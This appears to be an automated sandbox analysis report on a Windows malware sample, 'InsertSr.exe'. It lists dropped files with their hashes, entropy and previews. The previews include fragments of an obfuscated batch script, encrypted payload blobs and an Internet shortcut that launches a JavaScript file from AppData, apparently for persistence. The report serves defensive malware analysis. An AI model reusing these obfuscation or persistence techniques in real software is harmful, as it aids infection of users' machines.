Joy=i..OipExpensive-Advice-Beaver-Kidney-Planners-Terrace-Formula-Sight-Heavy-..AqAScenes-Calm-..vPNJungle-Sufficiently-An-..DILWorldwide-Best-Merge-Candidates-Kurt-Maintenance-..WmzEquipment-Behavioral-Beside-Entertainment-Ahead-Newbie-..GIhYFirms-Hung-Playback-Spider-..eeDanger-..Set Essential=X..ZSMetal-Healthy-Negotiations-Police-Elite-Magnetic-Defensive-
Process:C:\Windows\SysWOW64\cmd.exe
File Type:ASCII text, with very long lines (376), with CRLF line terminators
Category:dropped
Size (bytes):9945
Entropy (8bit):5.17404966843657
Encrypted:false
SSDEEP:192:LVnJWezHSpuHD4O6FKgImRV5OM5YuDkTpM6nHgzPMj0kWtj7mqGSwDqcBJ:LVnWpuHqfRBWuoT3edkI7mq7w2aJ
MD5:A1B1D9BF9A8803A0AA03003DB6E5C5BB
SHA1:280689244F6513993389EB16BC445AB27D4A5E8D
SHA-256:A2191B6F2BDDE77BD52659322A374E952AFCAE826429095A676D8A439C56D522
SHA-512:0F1687D351F2291F9FD3487BACD3BDB3A93F2A515CAE11941A3A72EB5CBFBDE6CC6F6F4F27C09CEC78C92DCFAD5E6B3D8DCC124C158D27A67D0AB4FF3A1A87F7
Malicious:false
Preview:Set Shoe=q..pwGConf-Speeds-Months-Jumping-Mirrors-Cave-Demonstrated-Scratch-..EEBias-Bible-Ticket-Canberra-..vBSfMary-Dictionary-Supports-Rewards-Threaded-Examples-Aquarium-Accepts-Depend-..hIGorgeous-Nights-Pottery-Reliability-..VBbbSexual-Four-School-Criteria-Interaction-Recorder-Reputation-..NCjExpansys-Oe-Shemales-..WMFantasy-Hr-Charm-..KABPrivacy-Steal-Unto-..Set Spectacular=0..ovKaren-Expressed-Coverage-Blood-Convergence-Stops-..xnScVaccine-Solo-Seasonal-Surgeon-Election-Maintained-Enforcement-..CFMjDesign-Highways-Just-Finals-Obtain-Suicide-Marked-Cohen-Soundtrack-..XsQFlat-Ivory-Facial-..JWXPlus-Cc-Initiative-Reality-..Set Joy=i..OipExpensive-Advice-Beaver-Kidney-Planners-Terrace-Formula-Sight-Heavy-..AqAScenes-Calm-..vPNJungle-Sufficiently-An-..DILWorldwide-Best-Merge-Candidates-Kurt-Maintenance-..WmzEquipment-Behavioral-Beside-Entertainment-Ahead-Newbie-..GIhYFirms-Hung-Playback-Spider-..eeDanger-..Set Essential=X..ZSMetal-Healthy-Negotiations-Police-Elite-Magnetic-Defensive-
                                                                      Process:C:\Users\user\Desktop\InsertSr.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):887048
                                                                      Entropy (8bit):6.622152087334158
                                                                      Encrypted:false
                                                                      SSDEEP:12288:wV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:Sxz1JMyyzlohMf1tN70aw8501
                                                                      MD5:DA5E9ED8DD7E20633641F4383FD064C9
                                                                      SHA1:8BA42CF91152401A2E0503E0EF0FF4B0862CC940
                                                                      SHA-256:124E000A0550B77E40D45DB0E5F40B0493EFB70DEAF3AFD242F30D0C9B67FA95
                                                                      SHA-512:8DBF5994C5AB6CB9FA0219D210203BD45F65B80C5819A626E05B416DE56468B86B4E2B29A9F0B407FF89681741EAAECD188E8FDCC16C9B2C0077CD83595EA586
                                                                      Malicious:false
                                                                      Preview:]......j....E....(.I..{L...t..{L.....}....$xL.......KH..yi..........wq....&@..$.e&@..E...........}....{L.uUj...(.I.P.u... .I..}........j..u...8.I.j.....I._^[..]..........t....j...........E...sL.k.C.P&@.W&@..%@...C..%@.W&@................................U..8xL.....M.....t...9.t..@...M..J....@...]...Q.M..E.......H.I..E..8xL..E.P......E...U..M....t.W.}......N..._]...U..QQSVW.}..E.P..7....I..E...l....E...p....E.PV..p.I..M..E.;.t...uc;.x...u[.s..5..I....s........E.......E....;.|.....a....}..t...|...;............}..t......._^[..]....}....t.....x...|......U...M.VW...........|P;......H.Bt.......t<.u..@....M.....B`....8.t".....|.;........Bt....8.t..._^]...2...U..V..W.}.;............Ft.......t.Q.?....Ft.... .......;.....u?...|..Ft......8.u.O......}..........Nx.Nx.Ft.4......FtY.Nx.$...~x.v..Nx.Ft.D...8.t._^]..................j...U..Q..(xL.VW9.0xL.un.=4xL...........h.........Y..................E..}.P. xL......54xL.F.54xL...$xL.....0xL.....9.M..I..O._^..]...j.^3.;.~...$xL....98u#h.....[
                                                                      Process:C:\Users\user\Desktop\InsertSr.exe
                                                                      File Type:OpenPGP Secret Key
                                                                      Category:dropped
                                                                      Size (bytes):709632
                                                                      Entropy (8bit):7.999750536119722
                                                                      Encrypted:true
                                                                      SSDEEP:12288:Nfc73CSUDhzd8zmt5PxoZb6rdROwy/Ef1JcOeXm0+G5/7IDN75pDJSLcb:N07YV+oPxoZb6rIMUFW0n5zIDucb
                                                                      MD5:4718907CACC74674022BFB2DE75A6295
                                                                      SHA1:39FB61D02882F0F0DD23A6D14B8B0016F54A4349
                                                                      SHA-256:3571D240390623E02875C7953440216E9D9E840CA9E8A04F07E94CC65A439E3D
                                                                      SHA-512:5228F22505BA6466D6264B3AF5DF9D5807EFD7494111A712463A56A4610BBF70E28B2E25DB86BA9D107A39A12C47950741FAF51F68CDF1BB36E701359F277C39
                                                                      Malicious:false
                                                                      Preview:.vWo....*B...s.2.xP.s.J..{]@....<.2.V.........2I..s......).t=^t.I..5.z.]}~.......z=|.q|.....{..J.i_ZV..I.Lx...x3..S.b...T...2|.k>..C7d..]..I......#:.iY..bZ.z...l.wy..7..!&..Bi.l.`.}.J.6..z....(S...9.E.....kbh.....1.w.%.q.7x.........g.....*.=........DK...._VC..c..{GNG.{..6...lw#d..%).5........a%...g....N...ZUG.......~.T....E.G..".<.5....N...g.bV......v&..G..9....}**..Md{|K.2W.!Sk.5...|..h.g_ui..\.S...M.......'V..4G....>..#..|_.O..U.e]]/...I*.x.y.U...+F...i.....R..L...R. KWV...w.B>.......}`.\XB#*....x...(f.....~H.E.&.3.D2.y$.....J......9.H........=.[\}.#.21...J......z...u...O...4..s.5....~.)N7.+'a..:...\..e1...........^.........\.i5t.}../._.!]...L..x.Q.:M........J.f....U....8....>B.&..4.b..."..l.Q3..9...f..kW.....=p.x....=J....Ax....K....[j<.u...C.,.?......"...._..fC.rt..Qtz'Ln5.e...P.....V..2......%...X..1.l.Nu\..4.T>Q...............co....1....}..f..U..%a...Q.u..;!..#..SD..|...&...?.q..<B..^.....O.>..-O.A......X3........k..p.
                                                                      Process:C:\Users\user\Desktop\InsertSr.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):489837
                                                                      Entropy (8bit):7.999639719112566
                                                                      Encrypted:true
                                                                      SSDEEP:12288:P7nxBPjkhxJUQEfrjpY6gaGVza73UescXJ5N4j72XhyHq:P7nTPgCQEjjeG2a73Ue7XJEj7QyK
                                                                      MD5:CB8D1FF9647A7043E172F3D89F5B4368
                                                                      SHA1:0479927A90C908A547E3C5C195ED2D3780808CC3
                                                                      SHA-256:C1BD610F3AB6739E2FDDB6F76EEE2C7830FD756BA0D9B6EE399BD13C9F75E111
                                                                      SHA-512:4FA01DC89567DCFF7B15389FE3283426B53F5A28425D177557D30176421070A24D2AC5891D535B3E73ECA4893B6FAE3A559E56307029B84F4F69D66B77CB37FB
                                                                      Malicious:false
                                                                      Preview:..lP2S.z.v....OqN`.F.N.k.N<Y..&..d..(S.n.......aq..S..R............X..'g#c.n.&....3".#...H....b...&......72.H.5x>P.#.aG#..._.[."+..E.:..|;.t.AD.1;.8.n........W..o...$.%..S....F....4C...|j...84m....d.J..kx..|.iV8-....(.H%...c6..6.........x. ..L?..Pp.`2R..Q....KL..q.S.}\.Jmj0.w`.e.S.....).;.......`...=C.*...&...).....M../.....8.@";..aa.;4.4.r&..=.....@,.x.9..'3..w~Y.C0...|"P...v.h..OZh....L|.....0...G.<.U...u.Q.Y(8..X...B.h}.^l...J".4Zy..Z..O}'p.a...I...]%.9.....:..............*.r../p0..k..E.F.)..6l..b....%..&...M+!CK..E..7..7|g......w3...^.L..\...y(.....R.. .:!.:0o...=..X.q..iE..b.\.9.f,.C......0s...%....h.J3.'p=@....F28.....f..5wk..;<e......."..QE.p.....*...+k.....}f.;..R..l......X...$u.U8.#b...E..!.\'..............W....Pe.EU..-.(v.yK...}...]h`*.c..`....|..+.t~.'.v...Ut..*.d..m.f.c..sEF_.........[.uR.V...K.e....t.<....@. ...I...O...n...oQf......t.Z'.N.......KM.2T../j.4..`..mO...n.........X..5..e+...`M.ofg0.}PS...^.+.'n2...ZP9J.
                                                                      Process:C:\Users\user\Desktop\InsertSr.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):798720
                                                                      Entropy (8bit):7.999778033726275
                                                                      Encrypted:true
                                                                      SSDEEP:12288:K8RVnbj3FJtN14DD873rmYLCwatJCAsGJRsL+Ev/1d980BEMqQ72CvSF1lniVD2u:V33T238WWCwaQ/RvG0wCvE1oVDj37
                                                                      MD5:90C9581F1EEE0655DB6C69B03CD549B5
                                                                      SHA1:A09488C2FC79D9185869F04480D06123E41A6CEC
                                                                      SHA-256:8FA70ADFDEE491FD73FE7B70318F69B92021DF3DD0FC3E3EF4C554A5BAF4BB3C
                                                                      SHA-512:A3579431E0F6681EEFB09EF5BD062E84FBABD47FB93C1FE1990F8FD425818B647732AB673DEB187E1FD3BEF523C8D386891D664F0417E1C51F760633F5A68250
                                                                      Malicious:false
                                                                      Preview:l .$t.{.l.\J..s..........L.Q..L}K1G.xy(...y...T.. ._......,..t.}..`b6..=..F.wO.......;.Y*?....AM9..MZ..7/..n........P|...%D.....V.R..{.Hlv}3.i.)m...9N..a0dT.V..@..J.....m$..-x.i........L6...-...v*... K.a6.Y.Y.m.Hvn./7......Z.!i.....[\..H@2......]...V....*.W..P...l..H...I....2.L@.It...!I..O....%.R.Gdw../G......;;..pd=.......yU.a.e...!..#KKd....S.]r..!Z..j.R..y./..%.t?.G....P9.&T#.6..x.....&@..t...*.....3.\....F...o,.(..Q..Q.t..~..<.b...r..YI..z.+.o}.V...6......9..ND...@.`.../.k.2K.lv.p..nP.!..j..~A\.G..$.(9.i....S(.`3[29..............-.d.M..8|a...1wW...|gJ...|..e...B........}.$......|j(bas.$........G.....%..g.@)6.Q..-.!.99..uf.qf.m..yH..._.^..^vw..E....c.Q.=..[_zC...g.v.\...f$......;4....:.m.......R6..`Y....-n!..k-..l...... Y-.5.....3A......G..B ..0....0m.....Y8x.j67.P...b3.!..WX.+m8....X..<.G..,..R.......,#..fp.*....Y..V/...xW.L.w..J..\.j.n...........FU.X5...r=..1..I.R.CU...?..U.....,R*.......yZ..$zo.{....../.|^O.....8.x.r9..."3.B..
                                                                      Process:C:\Users\user\Desktop\InsertSr.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):885760
                                                                      Entropy (8bit):7.999752060898126
                                                                      Encrypted:true
                                                                      SSDEEP:24576:HO6xaGUTIVo4yj2OuwX1RmBaNZq4KkrLh23:HObGUTUo4eF/vZqqrLhK
                                                                      MD5:F34FFB21F15B95BA1989B07876A042B3
                                                                      SHA1:1AD3BEF6D5E942BD9C34C27781143CF478EF34E9
                                                                      SHA-256:3FAB51A350FD9588B35281DDDAC46A7F95ACA517B97E35567EFD8C568562C780
                                                                      SHA-512:61C2586B5018D2F5813AA48D9B53BD1E694D04418D388E7185F797B105CEE6382AD85153E043DD999FAEBB1A2380B1CDBD704640D1FAFC9B130C91F86158B581
                                                                      Malicious:false
                                                                      Preview:N..Ms!......=,.j.%...=.up..._?A...Oa.6.r,.:g....k...C........bn..1uf...>..B.*o.....e.A.......I.._~=6a....U....(.Q.T..V.d.i.....}.B.J0./..R..|.c....YR..p..'..\.2..... ... ../Qp.N..#....3..... d........1.[A.rS....w.......w.$.k.Sr.|....V..S..r.?.2U..:....&..I.vW.f!...[.77.Vc..o't..E8....p.7}xc!1rM../..r..`...b......e.5,Aeb..+42:vQ=DrK.5L,.Nv..........b,.I.4.T..^..fM>..h.....!.......A....V.....*..#;...!.%.Z6(..A1\. NV-{..o...).1.~o1s....x..ze...L.....et...A.1....n....51.i..H..,...bA.a..........QI......v..Q..Tl..b.D...fV.........,w..Um.L}..>.9..<c..3=..|!..-(...P.P....P..D .c.n.....].5...o,O.t...K..8<..%.po.#4w.b%_'R;Z...lbyW....J....O=8 .aR.:.m.NX...T...5/.5.i3G.@........-+1...\..8:l..........:O.-.H....J.d...gg.L..J...../.......e%.E.Uq....<.+...+.R...+.{s!..v.V.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H..
                                                                      Process:C:\Users\user\Desktop\InsertSr.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):660480
                                                                      Entropy (8bit):7.9996932677461405
                                                                      Encrypted:true
                                                                      SSDEEP:12288:+9rH7HUXg3bndCh6ERfhgK1A8NU4od05969G6RVeB2LzeTQOU9:+VbUXg3CfhJbNU9s606uIoC9
                                                                      MD5:B5EA13497EAE57FACA5218A55BDD81D1
                                                                      SHA1:B6379326465B2B3DAA2B56CF855017D30C7AEBAA
                                                                      SHA-256:C67D471849F306EB17F543A6478F01DB34EFAE3DD05B78E46D39E28BC1B9496A
                                                                      SHA-512:6884CA2E7A9A38B6E06E289861671A9C0C252AE0D4D6088B696FA943FAC3CE5B0B89E0ADDE8E83A26EC6FB1C3675C8E75A4A9E95713F282E4E5A98CAE4CECAB5
                                                                      Malicious:false
                                                                      Preview:e.C..I......J2...6..e.{R@.....r.V.*..y..iQ..#j'.......*.6L{..h._.LN.x....F.d...d.......Wk..........0.'g!%H.......(..A1....p..ml.'..oH..F;.._h.|...$....!7......|...n.\..g..1J...Z.D.w.S@H.#.........\w...W/z...u.....'I.`D..../..?u.....p.........A.z...y.0...w._+...3..S.2L.....]o...u2.A..j........Q.........Imy.L.2..T...R..k.=...i...$.. f........wmpAX..gd..|1.~......"._.....M....9.a.]...~:hp.....`7W.2R.^.K47...:.J6._:......:.9f.......\...$.C..mp..OX.Q.E}..5.....9.R.D.b..T...~7.rm.I......g.\P..>P4.e..h.;G......U.Y.....Z.3..QB.t~..\.A.y....#w8.y[.M2dj........=_x.\.k.ec........qE>C..o..... .y...7b8..y.......q.l.H<.U......."Ef.`...=.....*....BW....m?.....v.......K._....&.....,8...G...M...o........4..}...l..........y.....>.p...../...U1......w.rP..9.~..!...tC.NR$w_. .]:.~.?..J0.g.bn.......=.?~N...}.p ~@w.`S..(M....^.V..<....*1.......y.x.?[.cS[8....>~....`....@.&./4..^..,.}!G.O,...t:Au.|.....G...Zk.c..zh.I.Ust..9...&.L..lR.,.._A...|..W.osj$K&
                                                                      Process:C:\Users\user\Desktop\InsertSr.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):801792
                                                                      Entropy (8bit):7.99977707187213
                                                                      Encrypted:true
                                                                      SSDEEP:24576:O36Ed4nSSuxLOO7a8F/xJuZ770YhYjNE9:ln8157lF/xJu970Yme9
                                                                      MD5:1097150FDE61428C31E7EF7664F04891
                                                                      SHA1:8885F12AC9F14DBAB3C42619BAA5D0CAAA3959D4
                                                                      SHA-256:B8822B85254FB8EB45D028EC14D2262E6DDC7D21FEB93742E413A7FC6FDB2267
                                                                      SHA-512:A8EFDE5B7C1E44FDFA7BD7953937E7D4772F6CD206AE9D60A2DD885C1DCAD51281B0560BEAE383E74147A2DF4A95537F27736FCECB97F95C5763FE19877B8A20
                                                                      Malicious:false
                                                                      Preview:l..!.V....0.K</...1?..~......C.[0...."a-.Q5AB.]..,.4b ...;.B...=.9Qp..x.U.(..N....h.*.M..y...F.......%.7..9(j....c..5..-.9.Qm..4-.b.......R.pC.....i.......I.?....r.~O..]...HD8...&.pm,Onb`..{.F](.lj.. n.....@...r.aX..k=G.:.'..b ....e..cO3y...>....$..B...g...ntf].KfGe......J.+....p.h.c.9....^~...p.r.?*.b...Kt....~O])....q../...e}.|y.q+?.zk..-..L\...^..MN.^..Pp"......YN.".,>3q.A.#n.[79.l/F..[........g.[.B)..y.t._G..J.%_...KA...wO.B.!.u.>...e..OMn..R..H.o.....*.........q....,.....<.E..l.i*../ %!b......<....r.....*..w.....r.^:WjNao.z.:+.:.....%:..s\...w.'...RIn.%..W..&...G.c.....g..S@!....Z%jWT.]..W+.y.k._Z...r.f..W..X$...@...S).J....XHAT.1..2.....-..O`p..A8.4..pq.3.{.}......W..'r...[}.n.p.{..)...[y`~.6(..u...>.0..;.K1.G....4kd'RC.<*B.Q.!.l..4.y.....6.........m.....i..D.@.zF..........DP|*..P.[.;~........C....>.!.gO...o#.l........wa:.l.,o..&*UM.....{........Tq..:.stR......hp..........^....C.]".$Z...".T6@R......0.Z.N..6.6......W....ur.......+.F
                                                                      Process:C:\Users\user\Desktop\InsertSr.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):6592
                                                                      Entropy (8bit):6.173529326074231
                                                                      Encrypted:false
                                                                      SSDEEP:192:LHAeOqAFDw09CV/2nPvj6DdMP3r1HI5jMX:LHAHhww+/2nlP3r1WQ
                                                                      MD5:74A0A10D8879E28CF435CF7C6FED821E
                                                                      SHA1:C5BFFF25492A5B885F6846C80352B6ED5B53785B
                                                                      SHA-256:C3DDAD5013ACEF2A15DDA4CDE3DD48ABC190AD191D2D12C979A9FE1072B2306C
                                                                      SHA-512:4CD9100F3AB73AFFAD00138E96D76E9821B2FE31DC7203DE214B0C2047458C72A6307BD9EE392C63E60A1AA4569FD0ED0DFB8A8C2C848301C7E16391B5DBEC8A
                                                                      Malicious:false
                                                                      Preview:SequenceOctoberContributionRef..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................
                                                                      Process:C:\Users\user\Desktop\InsertSr.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):541696
                                                                      Entropy (8bit):7.999652031061977
                                                                      Encrypted:true
                                                                      SSDEEP:12288:MCrMz2LKeVPeYyfk+gjafJFHQUj7LVC28oO25:qzkKedyfk+gj+HQUY28oP5
                                                                      MD5:680233105A6CF887F2504025597EE1BD
                                                                      SHA1:B833B501366CBF5AE9B3D7A14A4AC02A096BA2C2
                                                                      SHA-256:E2B2F6CA865D668FCA407A08A65E0971B0C6F031E9E1F00720032F6790108296
                                                                      SHA-512:575721CA5676C29927520D6B0E354A33FC25A5BBA36D2BABC9785488BDE8301F6C3F84BFD3D43978690523BF39C9B051AAFF061807A31FDB693425BD5F2EE17B
                                                                      Malicious:false
                                                                      Preview:. .SsB..8..F.......:z.G.\._.<...R.C.h..?>.|J.....,>|.[.4.".../...@.n./x......J...'.T._;.O4?...!......@..B@...2..S.#>X.#.HX..7C.Y.?QQH...yhk..oz....l....kV;.._..?./.O.q.f^K.a..1.7V4').'.od8...:..L/Q. .(1.VS.e.;......k...{..iu..CZ.|"..m....NSr.N.v6....]....<d+.']az..[/..;{....c..|...%[.I..Q..b.:.Y....b.s...Zuk..&G......lc..@SCG...wYA..n".N...E.(..|.#]..Z[."..2..:.1o....a.e...[?..y._,}.bVT7.)v..0/>...M..J.t...k..b<.}...)U..6%..=.g.......X..b....t..d...... .i..lP...N*O...'0w"8......]Y...T..%Z....I....2.5.....*....fT...Co...W6..~..D...Z$...w\,.".r.W..<...k..3Y.....P._$P........l..$v...K/..0..Z....b.e&.._......U.'7.3Nd.N.t....2.Z..^2=#{...3|..ZZ.!...........${.pG...zb9.e......]..(..._.....E-..7.r.......(G|...[....gB. {O..,2n|.'..R..yX.D.(.un.@.Q.>h...z....S...$.V..@............z...n..XI..T.6)%.'dM.....y..?;r.F....1....H.*..y..1......b.A..d..t.....2.~*.G...{z..N....J..=TA.63.z.\.TP.C..l..?.Z.g.-( .|..v.~.nQ.T-1..,b=9/#j...H1...e:...@
                                                                      Process:C:\Users\user\Desktop\InsertSr.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):863232
                                                                      Entropy (8bit):7.999790074089092
                                                                      Encrypted:true
                                                                      SSDEEP:12288:3ENrmH8kYsUET4qtOu12c6hS3ThXGodoD+UOl/NO4tH0vN7eMVkVE6eauQN0mY9i:UgckYswqcU25hSjtQqtl/p2FBkV/
                                                                      MD5:DE288DA987BD185C9B48EBAA350447D6
                                                                      SHA1:8E6311419B3FEE4F908E7566BD26B56170F8C752
                                                                      SHA-256:45193E176EB2E901766F1061F753AE5BF260C65502053A18BBCB495232B66417
                                                                      SHA-512:DF863633D986D5CBBA4898D95AF368819167FA7E9157173A52086F3E213DE457AA4B6027B0D997728191047113B5E140696CEB65501CE807EAE41F0900A36142
                                                                      Malicious:false
                                                                      Preview:.EpJ.i'..F.._.....b.....f.0...H...kx..W..u.aXwu>.t...z8..$n!bS.H...Z....Q1.c.u......|9..g.<T....u.....+.f.)..FL.b.....S...U..Sz...;.....=f.....se...G.m..%..Ss.)......Sr.$....k..i...Y}'..3.......w.U....+.l.".m..%...{>.|..7b(W...dj\...f....t.R.E{...v.2MT..yh..Hr.v.K#.T..V.bq%[...2p..%e..VIp.9.y.........B....-..8....6......+Z.%D{;.|.lR.n.p..{......p...&..Od.fm.\J.r.1..%.c. X..(...R..tL..9.K....u.RG...M.....IiIB..so.Z....X.....0.,h.B..Ez0R,=0a.].$F@........$.$4........Jr.@....;..\P.E/............<6....{.7.......a.x....#M..0.......]...5...@......V=...3....)Z.i...fR.e..2........nG:..J.w.=.z.2....2....7..L......:....i...."..q....d.x.....CY..y.!\.22HA.%.....9...B.B..;..."..r+..t.*{U#&e.q....Dh!U.t...&.OGJ....@y..`k......x..%*.jz._C..pT..4Q....1X.9mG....B..[k.#m.E..[...._..m..4K7.[.R..z.Y}6..JZ>&p...M|`3D.^._..F3.P..(.<...JA.....M.........5.KaFH...xp..s}.<...q?.N...=.^G.zd...G..B>..6v-[..F9+....<..O[..5....k..S.r.yk'q3.1..$Z)i.V...c....X!.X.T.!!...S.|
                                                                      Process:C:\Users\user\Desktop\InsertSr.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):552960
                                                                      Entropy (8bit):7.999624585975711
                                                                      Encrypted:true
                                                                      SSDEEP:12288:hBy5VpFQFTKD+kxLaRpkud1ps2X8bYhcroypGCi+2ou:3y5VpmTKD+Rsuv8bccroypg+2ou
                                                                      MD5:5C52183AB3EF62D282F1BA9F0D12545E
                                                                      SHA1:5837096364ABAAAABBD85E262F0F565DED556131
                                                                      SHA-256:9DE3DAE3ADAEA59C23BC5536A736C3F0140C085D9982269FFBD52A137E13C804
                                                                      SHA-512:896DC24E8F9E0F5FAD4F8FA1AAD28B8F9A4EC1FB29018B63740A518F48C81F8029C60247F40842A1639BCA875215DEE9B915CF36CA30D9DB6D1742B81298C4B4
                                                                      Malicious:false
                                                                      Preview:....&.+.S..a.er............x/s+..f..I.n.......d..q..{g.SR..q.J...J...$Y~<....i.&A. ...c..K#8...P..<...N.e.gMx......~.y.o.WP..M.dY.|.5..v."..w...1...E...d~....J.g+.D.Z........S4......F.pPi.j."A....v.;8.3a.7.N.9.a_.......y.l..Y..'..9k./..\.M:...`....$.#..^`}F..$N|.+..n....tK.K0...bra..N.....'...K{..A..../..]^.v...Sf=n.......nk..V.-z.O2...u..w....jW4....f...x9........;p.Qy.q..5D.$...'.5]...q....E...K..g.d.*.qV`.pD./..L....R.{..!%.-....?......G.o..n..z(..V(.......22.M<.....0..B...\.......ep..wV:.k<.?..0x.x..pD.G.I.s...........[!X..g..c. ...3....>ND.V.R....3X..V.o..Z..Wc...C...`..W...+.*~.h..:..Oh..a.>.x......94S.......]......F...V..$.L.....Z;<%.O.../`yN.g7N..}.:...+ ,..O.[.S)>/.....b&C.=./.v=.......|+......Rz....xCN.`.)TtW.sI.Z..-V.>..K.Q..[!....(q\f..e.A4....|y.Z....=.}&../V.j.K....m...PL.|.oH.@.S5L.Lu..5....TG...RKe2....)]......;S..d.@."...;/...{`.K.....w+Y=}......H5.r...........n,:..(..7........../aJ.....+.kE.z.6..#.K.R.Z..m..5.75.4.L:;R.-. ..
                                                                      Process:C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):416
                                                                      Entropy (8bit):6.2423262451025385
                                                                      Encrypted:false
                                                                      SSDEEP:12:Ei4vAbT6X4arcZmY7rjAPpD5wejDD5h+HBpF93zh:Me6Xh8fr8P155DDWhpFVzh
                                                                      MD5:409D137F2D82C0B46DB2F359FDB18706
                                                                      SHA1:66C6D29DAD0C12C20B91E93D3EAEC725C282FBEC
                                                                      SHA-256:74AAA8B2DA17F4CCEADC9D43AE273B728F9C96FF398FF22F30B4A2AD5664391F
                                                                      SHA-512:237BA8159FE5B41D607E6CB3CB725695250B186ADE32747CF0AF7279CAE563139B835269B34A01E44668216A44AF56872CDE0CA03EADE58F0132DC2B7A66A13E
                                                                      Malicious:false
                                                                      Preview:...'.4.....".\.(S /,A.:RL.,0]? .X..0M...QR-'@.=.Q.])Z.,.\..&M][.XS'<^<./U6.*E."....#.*)....;.-..Y.._FP.*A'+^WV.5_/V.@+;,[../G!W.\S..P\ W_/..@/_QU?(.X.7$B)\>..9^.3....Z..:.TS..7A!/(L.WTPPV!_,..M[W5[.0#_.X#Q!#$G?.<_3=*U&>R_..[@..TZ(Z.X#W.B.#P..[..!.!...#.\*.S67WA. SL./'X..+V.&.[..(G.*._. .P,:.Y#$.@#:&Q.X?Y02;X^[.M(\.[1..Z..#P.%'E.9>.Q;..V....;..)..Y:.^F!.=A.: P"_1Q.."@'%.R.^/Q3P#^.^6M5?3[.6X^!3.V..5G&.7_69-U..0].1_
                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                      File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.js" >), ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):98
                                                                      Entropy (8bit):4.7551596204856645
                                                                      Encrypted:false
                                                                      SSDEEP:3:HRAbABGQaFyw3pYoN+E2J5sMLTrABDcb:HRYF5yjoN723saABDw
                                                                      MD5:8125B47116C541239E3500828EB8F41D
                                                                      SHA1:E715A37182EE4842946B36E0EF7F778DBF8E5A5E
                                                                      SHA-256:61D283B69D92456EB6FB03F7B21F88D808792BB8F1C472528C611247E7EA6FD1
                                                                      SHA-512:BFC5697B485D7D2CD95B7D52850D5678899CF1F9289BE4000007020B4333A64951807A98E72EB5A187ED9F697CC73588CE91F8C25C4BB618EF2FB4A0735384C8
                                                                      Malicious:true
                                                                      Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.js" ..
                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Entropy (8bit):5.202035015368334
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:InsertSr.exe
                                                                      File size:45'088'780 bytes
                                                                      MD5:c4c26460f0f0fc5f6acb5a9dca7d251c
                                                                      SHA1:5a9a4337d0159af2d23457a396ebc4db5114aabf
                                                                      SHA256:68da2cf9516fa5b50b96c7b63d3fab3149497226c3ee7b444f5be1d292df4a20
                                                                      SHA512:9d56e09714c9bd78c1d1c0f7e469f1c206481baa708e660f8cff960598b699197910eb5b5aff9d3c8738443ba24081c2479be8bb401f4e6ea3707ba401d4b0e7
                                                                      SSDEEP:98304:EXuh+Vhzg/8l2Gv5IQDaAsHeuC1QSGvQ5NvAcPIciyfEHWlM/M5r2ROHN8053y/M:anUXnAG9C1QQyyfmWlkMY0Ht9UUN9WdO
                                                                      TLSH:45A799FEB1248E601167C96776B27287A9FBEFE2B46028341CF1D466F484B9D436324D
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n... ...B...8.....
                                                                      Icon Hash:07334dcc0e4d7727
                                                                      Entrypoint:0x403883
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:true
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x4F47E2DA [Fri Feb 24 19:19:54 2012 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:5
                                                                      OS Version Minor:0
                                                                      File Version Major:5
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:5
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:be41bf7b8cc010b614bd36bbca606973
                                                                      Signature Valid:
                                                                      Signature Issuer:
                                                                      Signature Validation Error:
                                                                      Error Number:
                                                                      Not Before, Not After
                                                                        Subject Chain
                                                                          Version:
                                                                          Thumbprint MD5:
                                                                          Thumbprint SHA-1:
